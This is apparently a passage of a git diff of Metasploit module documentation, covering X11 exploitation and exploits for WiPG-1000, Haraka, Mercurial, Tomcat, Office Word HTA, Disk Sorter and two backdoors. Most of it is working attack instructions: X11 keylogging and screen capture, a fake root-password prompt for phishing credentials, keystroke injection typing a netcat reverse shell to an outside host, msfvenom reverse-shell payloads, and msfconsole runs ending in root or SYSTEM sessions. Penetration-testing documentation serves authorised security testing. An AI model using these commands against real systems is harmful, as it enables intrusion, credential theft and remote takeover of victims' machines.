name of display: 192.168.2.75:0
|
||||
version number: 11.0
|
||||
vendor string: The X.Org Foundation
|
||||
vendor release number: 11803000
|
||||
X.Org version: 1.18.3
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
|
||||
Exploiting this mis-configuration has several methods. The target can have their display viewed, keystrokes logged, and potential keyboard typed.
|
||||
|
||||
### Keylogging
|
||||
|
||||
To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy)
|
||||
|
||||
`xspy -display [ip]:0`
|
||||
|
||||
### Screen Monitoring
|
||||
|
||||
#### Entire Display
|
||||
|
||||
It is possible to monitor the entire display (all windows) and view the content.
|
||||
|
||||
- Take a screenshot: `xwd -root -display [ip]:[display] -out xdump.xdump`
|
||||
- View screenshot: `display xdump.xdump` or `xwud -in xdump.xdump`
|
||||
|
||||
#### Specific Window
|
||||
|
||||
To monitor only a single window (a terminal for instance)
|
||||
|
||||
First, we need to determine which windows are available and what their processes are:
|
||||
|
||||
- `xwininfo -tree -root -display [ip]:0`
|
||||
|
||||
Once you determine which window you want to monitor, you'll want to use the `windowID`. Now use the application `xwatchwin`
|
||||
|
||||
- `xwatchwin [ip]:0 -w [windowID]`
|
||||
|
||||
### Social Engineering
|
||||
|
||||
Obviously watching keystrokes is good, but we want to coax the user into providing their password. We can do this by using xterm to display a login box to the user.
|
||||
|
||||
This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10.
|
||||
|
||||
1. start `xspy`
|
||||
2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"`
|
||||
- Notice it asks twice for the password incase of a mistyped initial password. This can also be adjusted to just say password or the real user's username
|
||||
- The victim's typed text by the user will not be masked (`*`)
|
||||
|
||||
### Direct Exploitation
|
||||
|
||||
Use `exploits/unix/x11/x11_keyboard_exec`
|
||||
|
||||
### Typing Commands
|
||||
|
||||
Similar to the method `exploits/unix/x11/x11_keyboard_exec` uses, its possible to use `xdotool` to run commands on the remote system.
|
||||
|
||||
To install `xdotool` on kali simply run `apt-get install xdotool`
|
||||
|
||||
Now, you can directly interact by typing commands (which appear on the users screen), an example would be running xterm and launching netcat.
|
||||
|
||||
For this scenario we run a simple reverse netcat to 192.168.2.9:80
|
||||
|
||||
```
|
||||
xdotool key alt+F2
|
||||
xdotool key x t e r m
|
||||
xdotool key KP_Enter
|
||||
xdotool key n c space 1 9 2 period 1 6 8 period 2 period 9 space 8 0 space minus e space slash b i n slash b a s h KP_Enter
|
||||
```
|
|
@ -38,7 +38,7 @@ that through command injection to gain Meterpreter root access.
|
|||
|
||||
With an attacker node that resides within the ISP network, do:
|
||||
|
||||
- Set `payload` to `linux/mipsbe/mettle_reverse_tcp`
|
||||
- Set `payload` to `linux/mipsbe/meterpreter_reverse_tcp`
|
||||
|
||||
- Set `RHOST` to the target router's IP
|
||||
|
||||
|
@ -73,7 +73,7 @@ module's own HTTP server and host it externally. To do so, first generate
|
|||
the payload ELF executable using `msfvenom`:
|
||||
|
||||
```
|
||||
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/mettle/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
|
||||
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/meterpreter/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
|
||||
|
||||
No encoder or badchars specified, outputting raw payload
|
||||
Payload size: 212 bytes
|
||||
|
|
|
@ -18,7 +18,7 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
|
|||
|
||||
**PAYLOAD**
|
||||
|
||||
The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
|
||||
The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
|
|
@ -0,0 +1,53 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits a command injection vulnerability in the [wePresent WiPG-1000](http://wepresentwifi.com/wipg1000.html) device. A description of the exploited vulnerability is available in section 3.4 of [this advisory](https://www.redguard.ch/advisories/wepresent-wipg1000.txt).
|
||||
The latest vulnerable firmware version is 2.0.0.7. Newer versions can be downgraded to [the older firmware](http://www.wepresentwifi.com/assets/downloads/wipg1000/wePresent.1000.2.0.0.7.nad.zip).
|
||||
|
||||
There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method checks for the presence of the `rdfs.cgi` file and whether it contains the string `https://www.redguard.ch/advisories/wepresent-wipg1000.txt`. All known versions of this file on the device are vulnerable to this command injection.
|
||||
|
||||
Manual exploitation would equate to browsing to the URI `http://<ip>/cgi-bin/rdfs.cgi` and entering the String `; command;` in the input field and submitting the form.
|
||||
|
||||
Version 2.0.0.7 was confirmed vulnerable, and firmware 2.2.3.0 was released to fix the exploit.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Make sure the device is running.
|
||||
2. Start msfconsole.
|
||||
3. Do: ```use exploit/linux/http/wipg1000_cmd_injection```
|
||||
4. Do: ```set payload cmd/unix/reverse_netcat```
|
||||
5. Do: ```set RHOST <ip>```
|
||||
6. Do: ```set LHOST <ip>```
|
||||
7. Do: ```exploit```
|
||||
8. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
**PAYLOAD**
|
||||
|
||||
The `generic`,`netcat` and `openssl` payload types are valid.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Firmware 2.0.0.7
|
||||
|
||||
The following is an example run getting a shell:
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/wipg1000_cmd_injection
|
||||
msf exploit(wipg1000_cmd_injection) > set payload cmd/unix/reverse_netcat
|
||||
payload => cmd/unix/reverse_netcat
|
||||
msf exploit(wipg1000_cmd_injection) > set RHOST 192.168.3.3
|
||||
RHOST => 192.168.3.3
|
||||
msf exploit(wipg1000_cmd_injection) > set LHOST 192.168.3.216
|
||||
LHOST => 192.168.3.216
|
||||
msf exploit(wipg1000_cmd_injection) > check
|
||||
[*] 192.168.3.3:80 The target appears to be vulnerable.
|
||||
msf exploit(wipg1000_cmd_injection) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.3.216:4444
|
||||
[*] Sending request
|
||||
[*] Command shell session 1 opened (192.168.3.216:4444 -> 192.168.3.3:50893) at 2017-04-20 16:11:48 +0200
|
||||
id
|
||||
|
||||
uid=0(root) gid=0(root) groups=0(root),10(wheel)
|
||||
```
|
|
@ -0,0 +1,81 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar:
|
||||
|
||||
```
|
||||
#install nodejs and npm
|
||||
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
|
||||
sudo apt install nodejs
|
||||
|
||||
#Haraka setup
|
||||
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
|
||||
tar xvzf v2.8.8.tar.gz
|
||||
cd Haraka-2.8.8/
|
||||
npm install npm
|
||||
npm install
|
||||
|
||||
haraka -i haraka
|
||||
|
||||
cat << EOF > haraka/config/plugins
|
||||
access
|
||||
rcpt_to.in_host_list
|
||||
data.headers
|
||||
attachment
|
||||
test_queue
|
||||
max_unrecognized_commands
|
||||
EOF
|
||||
|
||||
echo haraka.test >> haraka/config/host_list
|
||||
|
||||
# Launch haraka as root
|
||||
sudo haraka -c haraka
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**from_email**
|
||||
|
||||
String used in the SMTP MAILFROM command
|
||||
|
||||
**to_email**
|
||||
|
||||
String used in the SMTP MAILTO command
|
||||
|
||||
**lhost**
|
||||
|
||||
The address to serve the payload from
|
||||
|
||||
**rhost**
|
||||
|
||||
The address or hostname to target
|
||||
|
||||
**payload**
|
||||
|
||||
Any compatible Metasploit payload
|
||||
|
||||
## Example Run
|
||||
|
||||
```
|
||||
msf > use exploit/linux/smtp/harakiri
|
||||
msf exploit(haraka) > set email_to root@haraka.test
|
||||
email_to => root@haraka.test
|
||||
msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http
|
||||
payload => linux/x64/meterpreter_reverse_http
|
||||
msf exploit(haraka) > run
|
||||
|
||||
[*] Started HTTP reverse handler on http://192.168.1.1:8080
|
||||
[*] Exploiting...
|
||||
[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3
|
||||
[*] Sending mail to target server...
|
||||
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
|
||||
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session...
|
||||
[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500
|
||||
[*] Command Stager progress - 100.00% done (120/120 bytes)
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit
|
||||
msf exploit(haraka) >
|
||||
```
|
|
@ -0,0 +1,53 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[mercurial](https://www.mercurial-scm.org/downloads).
|
||||
|
||||
This module was successfully tested against:
|
||||
|
||||
- Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
|
||||
|
||||
## Vulnerable Server Setup Steps
|
||||
|
||||
1. Install mercurial on your test server
|
||||
2. Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper `vi $(which hg-ssh)`
|
||||
- Replace `if repo in allowed paths:` with `if True:`
|
||||
- Replace `cmd = ['-R', repo, 'serve', 'stdio']` with `cmd = ['-R', path, 'serve', 'stdio']`
|
||||
3. Setup a user with SSH pubkey auth
|
||||
4. Create a test repo in the users home directory and add a commit
|
||||
- `mkdir -p repos/repo1`
|
||||
- `cd repos/repo1`
|
||||
- `echo "hello world" > README`
|
||||
- `hg add README`
|
||||
- `hg commit -m "Adds README"`
|
||||
5. Restrict user in authorized_keys to hg-ssh binary only
|
||||
- `command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY`
|
||||
6. Verify SSH user can authenticate (should prompt and prevent a shell)
|
||||
- `ssh user@192.168.10.99`
|
||||
7. Verify SSH user commands are not allows (should prevent arbitrary commands)
|
||||
- `ssh user@192.168.10.99 ifconfig`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use exploit/linux/ssh/mercurial_ssh_exec`
|
||||
3. Do: `set RHOST <ip>`
|
||||
4. Do: `set LHOST <ip>`
|
||||
5. Do: `set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa`
|
||||
6. Do: `exploit`
|
||||
7. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
|
||||
|
||||
```
|
||||
msf exploit(mercurial_ssh_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.10.37:4444
|
||||
[*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
|
||||
[+] 192.168.10.99:22 - SSH connection is established.
|
||||
[+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
|
||||
[*] Sending stage (39842 bytes) to 192.168.10.99
|
||||
[*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400
|
||||
```
|
||||
|
|
@ -226,8 +226,8 @@ Of note, the user was given `manager-gui` permissions by default.
|
|||
HttpUsername => tomcat
|
||||
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
|
||||
HttpPassword => tomcat
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
|
||||
payload => linux/x86/mettle/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(tomcat_mgr_deploy) > set target 3
|
||||
|
@ -280,8 +280,8 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
|
|||
rport => 8087
|
||||
msf exploit(tomcat_mgr_deploy) > set target 3
|
||||
target => 3
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
|
||||
payload => linux/x86/mettle/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
|
||||
|
@ -342,8 +342,8 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
|
|||
rport => 8088
|
||||
msf exploit(tomcat_mgr_deploy) > set target 3
|
||||
target => 3
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
|
||||
payload => linux/x86/mettle/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
|
||||
|
|
|
@ -38,8 +38,8 @@ msf exploit(allwinner_backdoor) > set verbose true
|
|||
verbose => true
|
||||
msf exploit(allwinner_backdoor) > set session 1
|
||||
session => 1
|
||||
msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
|
||||
payload => linux/armle/mettle/reverse_tcp
|
||||
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
|
||||
payload => linux/armle/meterpreter/reverse_tcp
|
||||
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
|
||||
lhost => 192.168.2.117
|
||||
msf exploit(allwinner_backdoor) > check
|
||||
|
|
|
@ -0,0 +1,137 @@
|
|||
## Vulnerable Application
|
||||
|
||||
X11 (X Window System) is a graphical windowing system most common on unix/linux.
|
||||
The service can accept connections from any users when misconfigured which is done with the command `xhost +`.
|
||||
|
||||
This exploit has been verified against:
|
||||
|
||||
1. Ubuntu 14.04
|
||||
2. Ubuntu 16.04
|
||||
3. Kali via Emulation method
|
||||
|
||||
This exploit does NOT work against:
|
||||
|
||||
1. Solaris 10 Java Desktop System (alt+F2 has no effect)
|
||||
|
||||
### Emulation
|
||||
|
||||
This can be emulated (on kali) utilizing the following command: `socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0`
|
||||
|
||||
### Ubuntu 12.04, 14.04
|
||||
|
||||
1. `sudo nano /etc/lightdm/lightdm.conf`
|
||||
2. Under the `[SeatDefaults]` area, add:
|
||||
|
||||
```
|
||||
xserver-allow-tcp=true
|
||||
allow-guest=true
|
||||
```
|
||||
|
||||
3. logout or reboot
|
||||
4. Verification: ```sudo netstat -antp | grep 6000```
|
||||
|
||||
```
|
||||
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
|
||||
```
|
||||
|
||||
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Ubuntu 16.04
|
||||
|
||||
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install and configure X11
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/unix/x11/x11_keyboard_exec`
|
||||
4. Do: `set rhost [IPs]`
|
||||
5. Do: `set payload [payload]`
|
||||
6. Do: `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 14.04
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > run
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application"
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload
|
||||
[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400
|
||||
|
||||
id
|
||||
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
|
||||
cat /etc/*release
|
||||
DISTRIB_ID=Ubuntu
|
||||
DISTRIB_RELEASE=14.04
|
||||
DISTRIB_CODENAME=trusty
|
||||
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
|
||||
NAME="Ubuntu"
|
||||
VERSION="14.04.5 LTS, Trusty Tahr"
|
||||
ID=ubuntu
|
||||
ID_LIKE=debian
|
||||
PRETTY_NAME="Ubuntu 14.04.5 LTS"
|
||||
VERSION_ID="14.04"
|
||||
```
|
||||
|
||||
### Ubuntu 16.04
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26
|
||||
rhost => 192.168.2.26
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > exploit
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application"
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload
|
||||
[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400
|
||||
|
||||
id
|
||||
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
|
||||
cat /etc/*release
|
||||
DISTRIB_ID=Ubuntu
|
||||
DISTRIB_RELEASE=16.04
|
||||
DISTRIB_CODENAME=xenial
|
||||
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
|
||||
NAME="Ubuntu"
|
||||
VERSION="16.04.1 LTS (Xenial Xerus)"
|
||||
ID=ubuntu
|
||||
ID_LIKE=debian
|
||||
PRETTY_NAME="Ubuntu 16.04.1 LTS"
|
||||
VERSION_ID="16.04"
|
||||
UBUNTU_CODENAME=xenial
|
||||
```
|
||||
|
||||
### Kali via Emulation
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1
|
||||
rhost => 127.0.0.1
|
||||
msf exploit(x11_keyboard_exec) > run
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application"
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload
|
||||
[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400
|
||||
```
|
|
@ -0,0 +1,36 @@
|
|||
## Vulnerable Application
|
||||
|
||||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
|
||||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
|
||||
|
||||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the vulnerable software
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
|
||||
4. Do: `set rhost`
|
||||
5. Do: `set payload`
|
||||
6. Do: `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the backdoor
|
||||
|
||||
```
|
||||
msf > use exploit/windows/backdoor/energizer_duo_payload
|
||||
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
|
||||
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
|
||||
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
|
||||
msf exploit(energizer_duo_payload) > exploit
|
||||
|
||||
[*] Started reverse handler on 192.168.0.228:4444
|
||||
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
|
||||
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
|
||||
[*] Sending stage (747008 bytes)
|
||||
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: XPDEV\Developer
|
||||
```
|
|
@ -0,0 +1,68 @@
|
|||
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
|
||||
|
||||
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
|
||||
|
||||
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
|
||||
- Windows Vista Service Pack 2
|
||||
- Windows Vista x64 Edition Service Pack 2
|
||||
- Windows 7 for 32-bit Systems Service Pack 1
|
||||
- Windows 7 for x64-based Systems Service Pack 1
|
||||
- Windows Server 2008 for 32-bit Systems Service Pack 2
|
||||
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
|
||||
- Windows Server 2008 for x64-based Systems Service Pack 2
|
||||
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
|
||||
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
|
||||
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
|
||||
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
|
||||
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
|
||||
- Windows Server 2012
|
||||
- Windows Server 2012 (Server Core installation)
|
||||
- Microsoft Office 2007 Service Pack 3
|
||||
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
|
||||
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
|
||||
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
|
||||
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
|
||||
- Microsoft Office 2016 (32-bit edition)
|
||||
- Microsoft Office 2016 (64-bit edition)
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/windows/fileformat/office_word_hta```
|
||||
3. Do: ```set payload [PAYLOAD NAME]```
|
||||
3. Do: ```exploit```
|
||||
|
||||
## Demo
|
||||
|
||||
```
|
||||
$ msfconsole
|
||||
msf > use exploit/windows/fileformat/office_word_hta
|
||||
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf exploit(office_word_hta) > set lhost 192.168.146.1
|
||||
lhost => 192.168.146.1
|
||||
msf exploit(office_word_hta) > set srvhost 192.168.146.1
|
||||
srvhost => 192.168.146.1
|
||||
msf exploit(office_word_hta) > run
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.146.1:4444
|
||||
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
|
||||
[*] Using URL: http://192.168.146.1:8080/default.hta
|
||||
[*] Server started.
|
||||
```
|
||||
|
||||
After you have the malicious doc file and servers ready, copy the doc file onto the victim machine,
|
||||
and open it with Microsoft Office Word. You should receive a session:
|
||||
|
||||
```
|
||||
[*] Sending stage (957487 bytes) to 192.168.146.145
|
||||
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
|
||||
```
|
||||
|
|
@ -0,0 +1,73 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Disk Sorter Enterprise](http://www.disksorter.com) versions up to v9.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/5ffae2c1a4b2165e0dd2a8e37765ef0e-disksorterent_setup_v9.5.12.exe).
|
||||
|
||||
## Verification Steps
|
||||
1. Install a vulnerable Disk Sorter Enterprise
|
||||
2. Start `Disk Sorter Enterprise` service
|
||||
3. Start `Disk Sorter Enterprise` client application
|
||||
4. Navigate to `Tools` > `Disk Sorter Options` > `Server`
|
||||
5. Check `Enable Web Server On Port 80` to start the web interface
|
||||
6. Start `msfconsole`
|
||||
7. Do `use exploit/windows/http/disksorter_bof`
|
||||
8. Do `set RHOST ip`
|
||||
9. Do `check`
|
||||
10. Verify the target is vulnerable
|
||||
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
|
||||
12. Do `set LHOST ip`
|
||||
13. Do `exploit`
|
||||
14. Verify the Meterpreter session is opened
|
||||
|
||||
## Scenarios
|
||||
|
||||
###Disk Sorter Enterprise v9.5.12 on Windows 7 SP1
|
||||
|
||||
```
|
||||
msf exploit(disksorter_bof) > show options
|
||||
|
||||
Module options (exploit/windows/http/disksorter_bof):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOST 172.16.0.9 yes The target address
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (windows/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST 172.16.0.20 yes The listen address
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Disk Sorter Enterprise v9.5.15
|
||||
|
||||
|
||||
msf exploit(disksorter_bof) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.0.20:4444
|
||||
[*] Sending request...
|
||||
[*] Sending stage (957487 bytes) to 172.16.0.9
|
||||
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.9:59371) at 2017-04-24 14:46:52 +0100
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : PC
|
||||
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||
Architecture : x86
|
||||
System Language : pt_PT
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 1
|
||||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
```
|
|
@ -1,4 +1,4 @@
|
|||
linux/x86/meterpreter/reverse_tcp is the most pouplar payload against the Linux platform. It allows
|
||||
linux/x86/meterpreter/reverse_tcp is the most popular payload against the Linux platform. It allows
|
||||
you to remotely take over the compromised system, having control of the file system, collect
|
||||
sensitive information such as credentials using post modules, etc.
|
||||
|
||||
|
@ -209,7 +209,7 @@ meterpreter > help
|
|||
|
||||
## Using a Post module
|
||||
|
||||
One of the best things about Meterprter is you have access to a variety of post modules that
|
||||
